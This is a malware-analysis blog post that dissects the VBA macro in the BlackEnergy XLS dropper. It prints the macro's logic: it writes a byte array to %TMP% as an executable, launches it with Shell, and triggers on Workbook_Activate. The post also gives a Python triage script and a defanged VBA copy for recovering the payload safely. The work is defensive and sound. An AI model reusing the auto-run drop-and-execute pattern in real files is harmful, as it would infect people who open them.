Thursday, January 7, 2016

Analysis of BlackEnergy MS Office XLS Dropper

In the last few days there has been a lot of news (2) about a malware that caused a blackout in Ukraine.

The full intrusion chain, and how the malware relates to the blackout, is not yet clear.

(See Robert M. Lee (@RobertMLee) on Twitter: https://twitter.com/RobertMLee/status/685030648587812864 and https://twitter.com/RobertMLee/status/685031160901074944)

However, it looks like an MS Office XLS document was involved, or was at least somehow related to the attack.
I got a sample of the file and, to analyse it, I followed an approach similar to the one in this post I wrote some days ago:

Using REMnux v6, I check the content of the file with oletools (olevba, which lists the OLE streams and flags the VBA macros and suspicious keywords):

I dump the macro to a temporary file:

There are several subroutines (Init0 to Init25) holding the encoded payload, but the part that matters for getting the EXE is the end of the code: an executable file is written under %TMP% and then launched with the 'Shell' instruction. The Workbook_Activate event handler calls the dropper routine, so it fires as soon as the workbook becomes active, i.e. when the document is opened with macros enabled.

...
Private Sub MacroExpl()
    Dim fnum As Integer
    Dim fname As String
    Dim i As Integer
    Dim j As Integer
    Dim aa As Byte
    ' Init0..Init25 fill the array a(), indexed as a(i)(j) below, with the payload bytes
    Init0
    Init1
    Init2
    Init3
    Init4
    Init5
    Init6
    Init7
    Init8
    Init9
    Init10
    Init11
    Init12
    Init13
    Init14
    Init15
    Init16
    Init17
    Init18
    Init19
    Init20
    Init21
    Init22
    Init23
    Init24
    Init25
    fnum = FreeFile
    ' Drop path: %TMP%\vba_macro.exe
    fname = Environ("TMP") & "\vba_macro.exe"
    Open fname For Binary As #fnum
    ' 768 chunks of 128 bytes, written one Byte at a time: 98304 bytes in total
    For i = 1 To 768
        For j = 0 To 127
            aa = a(i)(j)
            Put #fnum, , aa
        Next j
    Next i
    Close #fnum
    Dim rss
    ' Launch the dropped file (window style 1 = normal window with focus)
    rss = Shell(fname, 1)
End Sub

' ThisWorkbook event handler: runs when the workbook becomes active, i.e. on open with macros enabled
Private Sub Workbook_Activate()
    MacroExpl
End Sub
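
Before touching Office at all, most of what the dropper will do can be read off the dumped macro text. The script below is an added example (not code from the original post or from the malware): it takes the relevant part of the macro quoted above, resolves the drop path, recovers the loop bounds and from them the number of bytes the macro writes, and flags the write/launch/auto-run indicators. It also validates a dumped file as a PE image and hashes it, which is the check to run on the vba_macro.exe recovered later. PAYLOAD is a constructed stand-in (a bare MZ/PE header), not the real binary.

```python
"""Static triage of a dumped VBA dropper macro, plus a check on the dropped file.

Added example, not the post's own code. MACRO is the relevant excerpt of the
macro olevba dumped (Init0..Init25 calls omitted); PAYLOAD is a constructed
stand-in for a dropped file, not the real BlackEnergy executable.
"""
import hashlib
import re
import struct

# Excerpt of the dumped macro (Init0..Init25 calls omitted).
MACRO = r'''
Private Sub MacroExpl()
    Dim fnum As Integer
    Dim fname As String
    Dim i As Integer
    Dim j As Integer
    Dim aa As Byte
    fnum = FreeFile
    fname = Environ("TMP") & "\vba_macro.exe"
    Open fname For Binary As #fnum
    For i = 1 To 768
        For j = 0 To 127
            aa = a(i)(j)
            Put #fnum, , aa
        Next j
    Next i
    Close #fnum
    Dim rss
    rss = Shell(fname, 1)
End Sub

Private Sub Workbook_Activate()
    MacroExpl
End Sub
'''

INDICATORS = {
    # a file opened for raw byte output
    "binary_write": re.compile(r"\bOpen\s+\S+\s+For\s+Binary\b", re.I),
    # byte-wise Put into that file
    "byte_put": re.compile(r"\bPut\s+#", re.I),
    # process launch
    "launch": re.compile(r"\bShell\s*\(", re.I),
    # event handlers / legacy names that run without user action
    "autoexec": re.compile(r"\bSub\s+(Workbook_Activate|Workbook_Open|Auto_Open)\b", re.I),
}


def find_indicators(macro):
    """Return {indicator name: bool} for the patterns above."""
    return {name: bool(rx.search(macro)) for name, rx in INDICATORS.items()}


def find_drop_path(macro):
    """Resolve Environ("VAR") & "\\file" into a %VAR%\\file string, or None."""
    m = re.search(r'Environ\("(\w+)"\)\s*&\s*"([^"]+)"', macro)
    if not m:
        return None
    return "%" + m.group(1) + "%" + m.group(2)


def find_loop_bounds(macro):
    """All 'For x = lo To hi' bounds, in source order."""
    return [(int(lo), int(hi)) for lo, hi in
            re.findall(r"\bFor\s+\w+\s*=\s*(\d+)\s+To\s+(\d+)\b", macro)]


def expected_payload_size(macro):
    """Bytes written if every innermost iteration Puts one Byte (aa As Byte)."""
    size = 1
    for lo, hi in find_loop_bounds(macro):
        size *= hi - lo + 1
    return size


def is_pe(data):
    """True if data has an MZ header whose e_lfanew points at the 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def payload_report(data):
    """Size, PE check and SHA-256 of a dumped file, for the analysis notes."""
    return {"size": len(data), "is_pe": is_pe(data),
            "sha256": hashlib.sha256(data).hexdigest()}


# Constructed stand-in for a dropped file: MZ stub, e_lfanew = 0x40, then the PE signature.
PAYLOAD = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40) + b"PE\0\0" + b"\0" * 16

if __name__ == "__main__":
    print("drop path      :", find_drop_path(MACRO))
    print("loop bounds    :", find_loop_bounds(MACRO))
    print("expected bytes :", expected_payload_size(MACRO))
    print("indicators     :", find_indicators(MACRO))
    print("payload        :", payload_report(PAYLOAD))
```

The expected size (768 x 128 = 98304 bytes) is worth keeping: Open ... For Binary does not truncate an existing file, so if something of that name was already in %TMP%, a dumped file longer than that carries stale trailing bytes and should be cut at 98304 before hashing.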

The next step is to dump the EXE. For that I first try to open the original malicious XLS in the VBA editor (Alt+F11), so I can set a breakpoint in that function before it is executed.

However, the VBA project is password protected:

But as I already have the macro dumped in REMnux, I can create my own XLS document and import the macro into it. So I do that (note that in a standard module, rather than ThisWorkbook, Workbook_Activate is just an ordinary Sub and does not fire by itself, so MacroExpl is started by hand from the editor; either way this is done only in an isolated VM, since the Init subroutines are still attacker code and the dropped file is the real malware):

Now I set a breakpoint on the 'Shell' call. When it is hit, the executable has already been written to disk, so I can see where it is stored before it gets executed:
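
As an alternative to stopping at the breakpoint, the imported copy can be defanged so that the payload is written but never launched. The routine below is an added example (not the dropper's code and not from the original post): it keeps the write loop, deletes any stale file first, writes to an analysis folder of my choice instead of %TMP%, and replaces the Shell call with a Debug.Print. It assumes the rest of the dumped module (Init0..Init25 and the array a()) was imported alongside it; the C:\analysis path is an assumption.

```vba
' Defanged copy of MacroExpl: writes the payload to disk, does NOT execute it.
' Assumes Init0..Init25 and the array a() from the dumped module are present.
Private Sub MacroExpl_Defanged()
    Dim fnum As Integer
    Dim fname As String
    Dim i As Integer
    Dim j As Integer
    Dim aa As Byte
    Init0
    Init1
    Init2
    Init3
    Init4
    Init5
    Init6
    Init7
    Init8
    Init9
    Init10
    Init11
    Init12
    Init13
    Init14
    Init15
    Init16
    Init17
    Init18
    Init19
    Init20
    Init21
    Init22
    Init23
    Init24
    Init25
    fnum = FreeFile
    ' Write into the analysis folder instead of %TMP%; .bin so nothing treats it as runnable (path is an assumption)
    fname = "C:\analysis\vba_macro.bin"
    ' Open For Binary does not truncate an existing file, so remove any stale copy first
    If Dir(fname) <> "" Then Kill fname
    Open fname For Binary As #fnum
    For i = 1 To 768
        For j = 0 To 127
            aa = a(i)(j)
            Put #fnum, , aa
        Next j
    Next i
    Close #fnum
    ' Original line was: rss = Shell(fname, 1)  -- replaced by a note in the Immediate window
    Debug.Print "Payload written to " & fname & " (" & FileLen(fname) & " bytes, expected 98304)"
End Sub
```

Run it from the editor with F5 (or Run > Run Sub); the Immediate window (Ctrl+G) shows the path and size, and the file can then be copied out to REMnux for the next stage.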

With this I have the executable :)
In future posts I will explain the approach to analysing the EXE file.